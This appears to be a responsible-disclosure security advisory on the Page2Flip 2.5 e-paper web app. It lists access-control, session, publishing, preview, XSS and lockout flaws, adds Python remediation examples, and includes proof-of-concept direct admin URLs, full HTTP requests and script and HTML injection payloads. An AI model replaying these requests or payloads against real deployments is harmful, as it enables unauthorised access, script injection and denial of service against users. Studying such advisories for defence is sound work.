Page2Flip 2.5 - Multiple Vulnerabilities

25 Aug 2015, reported by Dr. Erlijn van Genuchten (source: 0day.today)

Page2Flip 2.5 Multiple Vulnerabilities: Privilege Escalation, Missing Access Control

Product: Page2Flip
Vendor: w!ssenswerft GmbH
Affected Version(s): Premium App 2.5, probably also in Business App 
                     and Basic App, and in lower versions
Tested Version(s): Premium App 2.5
Vulnerability Type: Missing Function Level Access Control (CWE-935)
Risk Level: High
Solution Status: Open
Vendor Notification: 2015-06-29
Solution Date: 
Public Disclosure: 
CVE Reference: Not yet assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

With the Page2Flip Web application, it is possible to create e-papers in
PDF format that can be flicked through digitally. Such e-papers can be
used for magazines, catalogues, flyers, etc. (see [1]).

The Page2Flip app allows users to access functionality that should only
be available to administrative users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Missing Access Control Vulnerability Details:

The SySS GmbH identified that a user with low privileges can access
functionality that should only be accessible to administrators simply
by entering the corresponding URL directly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For example, by accessing the URL https://[host]/settings/users, all
user names and e-mail addresses can be read. Also, by accessing the
URL https://[host]/settings/extended, it is possible to perform the same
actions as highly privileged users are able to perform.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Session Management Vulnerability Details:

The SySS GmbH, acting as an administrative user, was able to delete user
accounts. However, the deleted users were afterwards still able to log
in with their credentials by following the normal login procedure, so
deleting an account does not revoke its access.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Create a user account with known credentials, delete this account and
log in with these credentials.

The POST request for deleting a user is:

POST /settings/users HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1042
Cookie: [cookies]

form_userSettings=form_userSettings&javax.faces.ViewState=-5924384961489816147%3A2243478473205355579&ice.window=9aib95sifa&ice.view=vvgml70e1&icefacesCssUpdates=&form_userSettings%3Aj_idcl=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&javax.faces.source=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70e1&ice.focus=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&ice.event.target=bimg&ice.event.captured=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1368&ice.event.y=373&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Privilege Escalation Vulnerability Details:

The SySS GmbH identified a vulnerability in the "publish" functionality
of the Page2Flip application.

Users who are not allowed to publish documents are nevertheless able to
do so. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request was sent by a user who did not possess
the privilege to publish documents. 

POST /catalog/[catalog id]/publishview HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1132
Cookie: [cookies]

downloadDialogForm=downloadDialogForm&javax.faces.ViewState=-8995724769283342270%3A-6610202228620183009&ice.window=9aibc007ll&ice.view=vvgml70v8&downloadDialogForm%3Ard_releaseTypeDownload=ext_catalog&downloadDialogForm%3Aj_idt916=Please%20choose...&icefacesCssUpdates=&javax.faces.source=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aibc007ll&ice.view=vvgml70v8&ice.focus=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit=Start%20download&ice.event.target=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&ice.event.captured=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1169&ice.event.y=796&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true

After sending this request, the user received an e-mail stating "You can 
download your pageflip!".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Insecure Direct Object Reference Vulnerability Details:

The SySS GmbH identified a vulnerability in the "preview" functionality
of the Page2Flip application.

Pageflip preview content can be accessed by unauthenticated users if
a valid URL is known.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By knowing or guessing a valid URL for pageflip preview content, an
unauthenticated user can access this data.
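If preview content has to remain reachable without a login, the URL itself must be unguessable and short-lived rather than a plain catalog identifier. The following Python code is an added example for this page, not Page2Flip code: it issues preview links whose query string carries an expiry and an HMAC-SHA256 signature over the catalog id and expiry, and verifies them in constant time. The /preview/ path prefix, the catalog id format and the secret key value are assumptions for the example.

```python
import base64
import hashlib
import hmac
import re
import time
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Server-side secret. Constructed placeholder for this example; in production
# generate it with os.urandom and load it from configuration.
SECRET_KEY = b"example-only-secret-replace-with-32-random-bytes"

# Assumed path prefix for preview content; the advisory does not show the real one.
PREVIEW_PREFIX = "/preview/"
CATALOG_ID_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def _signature(catalog_id: str, expires: int) -> str:
    """HMAC-SHA256 over the catalog id and expiry, URL-safe base64 without padding."""
    msg = f"{catalog_id}|{expires}".encode()
    digest = hmac.new(SECRET_KEY, msg, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()


def make_preview_link(catalog_id: str, ttl_seconds: int, now: Optional[int] = None) -> str:
    """Issue a preview URL only the server can forge; it expires after ttl_seconds."""
    if not CATALOG_ID_RE.match(catalog_id):
        raise ValueError("invalid catalog id")
    now = int(time.time()) if now is None else now
    expires = now + ttl_seconds
    return f"{PREVIEW_PREFIX}{catalog_id}?exp={expires}&sig={_signature(catalog_id, expires)}"


def authorize_preview_url(url: str, now: Optional[int] = None) -> Optional[str]:
    """Return the catalog id if *url* carries a valid, unexpired signature, else None.

    Guessing a catalog id is no longer enough: the signature binds the id and
    the expiry to the server secret, and the comparison is constant-time.
    """
    now = int(time.time()) if now is None else now
    parsed = urlparse(url)
    if not parsed.path.startswith(PREVIEW_PREFIX):
        return None
    catalog_id = parsed.path[len(PREVIEW_PREFIX):]
    if not CATALOG_ID_RE.match(catalog_id):
        return None
    query = parse_qs(parsed.query)
    try:
        expires = int(query.get("exp", [""])[0])
        sig = query["sig"][0]
    except (KeyError, ValueError):
        return None
    if now > expires:
        return None
    if not hmac.compare_digest(_signature(catalog_id, expires), sig):
        return None
    return catalog_id


if __name__ == "__main__":
    link = make_preview_link("42", ttl_seconds=3600)
    print(link)
    print("valid:", authorize_preview_url(link))
```

Previews that are meant for logged-in reviewers only should additionally require a session and an ownership check on the catalog; the signed link is the right tool only where anonymous, time-limited sharing is the intended feature.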

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Cross Site Scripting Vulnerability Details:

The SySS GmbH identified a persistent cross-site scripting vulnerability
in the Page2Flip Premium App.

At least the parameters "first name" and "last name" are not sanitized
sufficiently, resulting in a persistent cross-site scripting
vulnerability.

This persistent cross-site scripting vulnerability can be exploited in
the context of an authenticated user by storing script code in one of
these fields; the payload executes whenever the stored value is rendered,
for example when the affected user logs on.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request using the JavaScript code 
"<script>alert(1)</script>" as the value for the parameter "nachname"
demonstrates the persistent cross-site scripting vulnerability by
showing a JavaScript alert box as soon as this user has logged on:

POST /settings/users HTTP/1.1
Host: [host]
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1239
Cookie: [cookies]

accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request using the HTML code
"<div style="display:none;">" as the value for the parameter "vorname"
demonstrates that HTML code can be injected and reaches the generated
e-mail unencoded:

POST /settings/users HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1198
Cookie: [cookies]

accountEditForm=accountEditForm&javax.faces.ViewState=4267992298149872508%3A938284134061579979&ice.window=9aibbsfanj&ice.view=vvgml70uz&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=%3Cdiv%20style%3D%22display%3Anone%3B%22%3E&accountEditForm%3Anachname=xxx&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aibbsfanj&ice.view=vvgml70uz&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1251&ice.event.y=780&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true


The HTML source of the e-mail generated by this PoC contains the
following HTML code:

Hello <div style="display:none;"> xxx <br>

The unclosed div renders all subsequently added content invisible.
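Both XSS proofs of concept fail at the same place: the first and last name are written into HTML (the page and the notification e-mail) without output encoding. The following Python code is an added example for this page, not Page2Flip code; it puts a renderer that reproduces the described behaviour next to one that applies contextual HTML encoding, using the two payloads from the requests above, and adds a defence-in-depth validator for name fields. The greeting template and the length limit are assumptions for the example.

```python
import html
import re

# Payloads taken from the two PoC requests in this advisory.
SCRIPT_PAYLOAD = "xxx<script>alert(1)</script>"
DIV_PAYLOAD = '<div style="display:none;">'

# Constructed stand-in for the template that produced "Hello <first> <last> <br>".
TEMPLATE = "Hello {first} {last} <br>\nYour pageflip is ready to download.\n"


def render_greeting_vulnerable(first_name: str, last_name: str) -> str:
    """Behaviour described in the advisory: names are concatenated into HTML unencoded."""
    return TEMPLATE.format(first=first_name, last=last_name)


def render_greeting_fixed(first_name: str, last_name: str) -> str:
    """Contextual output encoding: every untrusted value that lands in an HTML
    text node is escaped at the point of output. html.escape also encodes
    quotes, so the same helper is safe inside a quoted attribute value."""
    return TEMPLATE.format(first=html.escape(first_name), last=html.escape(last_name))


# Defence in depth only: a name must not contain angle brackets or control
# characters. Encoding on output remains the actual fix; validation merely
# keeps obvious markup out of the database in the first place, and it must
# not reject legitimate names such as O'Brien.
_NAME_REJECT = re.compile(r"[<>\x00-\x1f\x7f]")


def validate_name(value: str) -> bool:
    return 0 < len(value) <= 100 and _NAME_REJECT.search(value) is None


if __name__ == "__main__":
    print("--- vulnerable ---")
    print(render_greeting_vulnerable(DIV_PAYLOAD, SCRIPT_PAYLOAD))
    print("--- fixed ---")
    print(render_greeting_fixed(DIV_PAYLOAD, SCRIPT_PAYLOAD))
```

Encoding has to happen in every output context, not only in the web page: the second PoC shows that the e-mail template is a separate sink that needs the same treatment.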

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Page2Flip application is vulnerable to denial-of-service attacks
against user accounts.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Page2Flip 2.5 Denial Of Service Vulnerability Details:

The SySS GmbH identified a denial-of-service vulnerability in the user
login functionality. When a wrong password has been entered five times
for a user account, this user account is locked.

The locked account cannot be unlocked by an administrative user, and it
was not unlocked automatically either, even after more than 12 hours.
Anyone who knows a user's e-mail address can therefore lock that user
out permanently.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Enter a wrong password five times for an existing e-mail address.
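The deleted-account finding earlier in this advisory and the lockout finding above are both failures of account state handling, so one added example (Python, written for this page, not Page2Flip code) covers both: deleting an account marks it unusable and revokes its live sessions, and a wrong-password lockout is temporary and can be reset by an administrator. The five-attempt threshold is the one observed in the advisory; the 15-minute auto-unlock window, the PBKDF2 parameters and the in-memory account and session tables are assumptions for the example.

```python
import hashlib
import hmac
import os
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

MAX_FAILED_ATTEMPTS = 5     # the threshold observed in the advisory
LOCKOUT_SECONDS = 15 * 60   # assumed auto-unlock window (the advisory saw no unlock after 12 hours)


@dataclass
class Account:
    email: str
    salt: bytes
    pw_hash: bytes
    failed_attempts: int = 0
    locked_until: Optional[int] = None   # epoch seconds; None means not locked
    deleted: bool = False


class AccountStore:
    """In-memory stand-in for the user table and the session table."""

    def __init__(self) -> None:
        self._accounts: Dict[str, Account] = {}
        self._sessions: Dict[str, str] = {}   # session id -> email

    @staticmethod
    def _hash(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def create(self, email: str, password: str) -> None:
        salt = os.urandom(16)
        self._accounts[email] = Account(email, salt, self._hash(password, salt))

    def login(self, email: str, password: str, now: int) -> Optional[str]:
        """Return a new session id on success, None otherwise."""
        acct = self._accounts.get(email)
        if acct is None or acct.deleted:
            return None   # a deleted account never authenticates, whatever the password
        if acct.locked_until is not None:
            if now < acct.locked_until:
                return None
            acct.locked_until = None          # automatic unlock once the window has passed
            acct.failed_attempts = 0
        if not hmac.compare_digest(self._hash(password, acct.salt), acct.pw_hash):
            acct.failed_attempts += 1
            if acct.failed_attempts >= MAX_FAILED_ATTEMPTS:
                acct.locked_until = now + LOCKOUT_SECONDS   # temporary, not permanent
            return None
        acct.failed_attempts = 0
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = email
        return sid

    def session_user(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)

    def delete(self, email: str) -> None:
        """Mark the account deleted and revoke every live session it owns."""
        acct = self._accounts.get(email)
        if acct is None:
            return
        acct.deleted = True
        for sid in [s for s, e in self._sessions.items() if e == email]:
            del self._sessions[sid]

    def admin_unlock(self, email: str) -> None:
        """The administrative reset that the advisory found to be missing."""
        acct = self._accounts[email]
        acct.locked_until = None
        acct.failed_attempts = 0

    def is_locked(self, email: str, now: int) -> bool:
        acct = self._accounts.get(email)
        return acct is not None and acct.locked_until is not None and now < acct.locked_until


if __name__ == "__main__":
    store = AccountStore()
    store.create("user@example.com", "correct horse")   # constructed sample account
    sid = store.login("user@example.com", "correct horse", now=1000)
    store.delete("user@example.com")
    print("session after delete:", store.session_user(sid))                      # None
    print("login after delete:", store.login("user@example.com", "correct horse", now=1001))
```

A temporary lockout with an administrative override keeps the brute-force protection without handing an attacker a permanent denial of service; a real deployment would also rate-limit by source address and log lockouts so that repeated lockouts of one account are visible to operations.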


Disclosure Timeline:

2015-06-23: Vulnerability discovered
2015-06-29: Vulnerability reported to vendor
2015-07-07: Reported vulnerabilities again as the vendor did not respond 
            to the first e-mail
2015-07-14: Reminder sent concerning reported vulnerabilities
2015-08-24: Public release of security advisory according to the SySS
            Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Page2Flip homepage
    http://page2flip.de/
[2] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

#  0day.today [2018-02-21]  #
